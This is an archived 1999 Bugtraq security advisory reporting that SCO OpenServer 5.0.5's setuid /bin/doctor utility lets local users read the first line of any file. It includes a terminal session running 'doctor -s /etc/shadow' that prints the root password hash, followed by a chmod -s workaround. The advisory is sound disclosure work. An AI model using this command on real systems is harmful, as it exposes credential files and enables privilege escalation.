[11759] in bugtraq
SCO 5.0.5 /bin/doctor local root comprimise
daemon@ATHENA.MIT.EDU (Brock Tellier)
Wed Sep 8 22:12:51 1999
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_040F_01BEF630.977394B0"
Message-Id: <041201bef65a$80544b10$3177a8c0@webley>
Date: Fri, 3 Sep 1999 17:20:17 -0500
Reply-To: Brock Tellier <btellier@WEBLEY.COM>
From: Brock Tellier <btellier@WEBLEY.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_040F_01BEF630.977394B0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Greetings,
INFO:
There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and =
probably others. By supplying a doctor script file you can read the =
first partial line of any file on the system (good enough for =
/etc/shadow). Example:
scobox:/bin$ id
uid=3D136(btellier),200(users)
scobox:/bin$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/bin$ doctor -V
doctor 2.0.0e 2
scobox:/bin$ doctor -s /etc/shadow
doctor: WARNING User message: invalid command name =
"root:xbfOLR0ekXN/o:10656::"
scobox:/bin$
And so on.
FIX:=20
Just chmod -s until SCO comes out with a fix. Although I certianly =
won't be changing it back to suid root anytime soon. If a hole like =
this exists, there are undoubtedly countless more lurking within. =20
Brock Tellier
Systems Administrator
Webley Systems
------=_NextPart_000_040F_01BEF630.977394B0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Greetings,</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><BR>INFO:<BR> There is a local =
root comprimise=20
in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others. By =
</FONT><FONT=20
face=3DArial size=3D2>supplying a doctor script file you can read the =
first partial=20
line of any file on the system (good </FONT><FONT face=3DArial =
size=3D2>enough for=20
/etc/shadow). Example:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>scobox:/bin$=20
id<BR>uid=3D136(btellier),200(users)<BR>scobox:/bin$ uname -a<BR>SCO_SV =
scobox 3.2=20
5.0.5 i386<BR>scobox:/bin$ doctor -V<BR>doctor 2.0.0e 2<BR>scobox:/bin$ =
doctor=20
-s /etc/shadow<BR>doctor: WARNING User message: invalid command name=20
"root:xbfOLR0ekXN/o:10656::"<BR>scobox:/bin$</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>And so on.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>FIX: <BR> Just chmod -s until SCO =
comes out=20
with a fix. Although I certianly won't be changing it back to =
</FONT><FONT=20
face=3DArial size=3D2>suid root anytime soon. If a hole like this =
exists,=20
there are undoubtedly countless more lurking </FONT><FONT face=3DArial=20
size=3D2>within. </FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Brock Tellier<BR>Systems =
Administrator<BR>Webley=20
Systems</FONT></DIV></BODY></HTML>
------=_NextPart_000_040F_01BEF630.977394B0--
